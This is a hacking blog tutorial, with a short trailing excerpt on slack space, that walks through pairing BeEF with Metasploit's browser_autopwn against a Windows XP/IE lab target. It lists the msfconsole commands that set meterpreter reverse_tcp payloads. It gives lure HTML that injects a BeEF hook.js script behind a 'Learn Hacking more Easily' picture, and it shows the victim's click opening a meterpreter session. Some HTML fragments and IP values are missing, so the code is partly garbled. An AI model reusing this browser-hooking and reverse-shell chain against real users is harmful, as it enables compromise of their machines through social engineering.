
Attack Vector BeEF + Metasploit

Hey guys,,
In the night, i will be writting tutorial about Attack Vektor on BeEF+Metasploit. Yesterday, i was written first about BeEF and Metasploit. Let's go on tutorial..

Should be prepared :
1. Backtrack (I'm using BT5)
2. Virtual Target (Windows XP + IE)

This step by step

1.  Open your msfconsole on terminal


2. Search browser exploitation

msf > search browser

3. Yeah, I'm using option auxiliary/server/browser_autopwn, type on msf

msf > use auxiliary/server/browser/autopwn

4. Then, type show options (Look at the picture) there are any information. But Looking on the LHOST has not been set. LHOST is mean localhost that is backtrack ip address.

5. To do a setting LHOST, type

msf  auxiliary(browser_autopwn) > set lhost

6. Setting Payload (I'm using WIN32 and JAVA)

msf  auxiliary(browser_autopwn) > set PAYLOAD_WIN32
PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp
msf  auxiliary(browser_autopwn) > set PAYLOAD_JAVA
PAYLOAD_JAVA => java/meterpreter/reverse_tcp

7. I thinks it enough, now running exploit and will be create.

8. Oke,,the proccess has been finished.

Local IP:

that is an exploit will be used. but before i change the local ip with my ip to be

9. Creating a simple HTML.

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<script src="jquery-1.5.min.js"></script>

    function showfriends() {
    function showHamper() {

    var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
<p><strong>Learn Hacking more Easily</strong></p>
<p align="center">&nbsp;</p>
<a href="" target="_blank"> <img src="LOGO-IS2C.png" alt="is2c" width="300" height="300"/> </a>
<p>Click Picture , Go to Website</p>

I have including javascipt and exploit

 Note :

- I'm using jquery-1.5.min.js

It is a file js will be connect to browser exploitation (BeEF)

file location


Or,  u can using script hook.js (http: look at the picture below

If u are using hook.js  you can compile the script will be

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<script src="" type="text/javascript"></script> 
<p><strong>Learn Hacking more Easily</strong></p>
<p align="center">&nbsp;</p>
<a href="" target="_blank"> <img src="LOGO-IS2C.png" alt="is2c" width="300" height="300"/> </a>
<p>Click Picture , Go to Website</p>

 jquery-1.5.min.js or hook.js their are have a function to connected to your browser exploitation (BeEF)

You can see any information at that (Exploit)

Exploitation will be run if you click the picture.

Save file with HTML format file (ex:Home.html)

10. Now, open the browser exploitation (BeEF). Go to Apps > Exploitation Tools > Social Engineering Tools > BEEF XSS Framework > beef-ng

11. Open the url on browser attacker.


username : beef

password : beef

14.  Now, open the file Home.html on your victim

On the other, Look your browser exploitation

 Nice,, the target has been connected. You can see any information at that.

15. Back to picture above, on the bottom left looks the Exploit.

16.  Good, and then click the picture NOW....!!

17. Yeaahhh,, Succesfully migrated to process

18. After that, you can type sessions -l

and then type again > sessions -i 1

meterpreter > 

This is my action :D

Good Luck... 


1 comment:

  1. Download SecurityTube Metasploit Framework Expert DVD FREE Enjoy ;)


Slack Space

Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...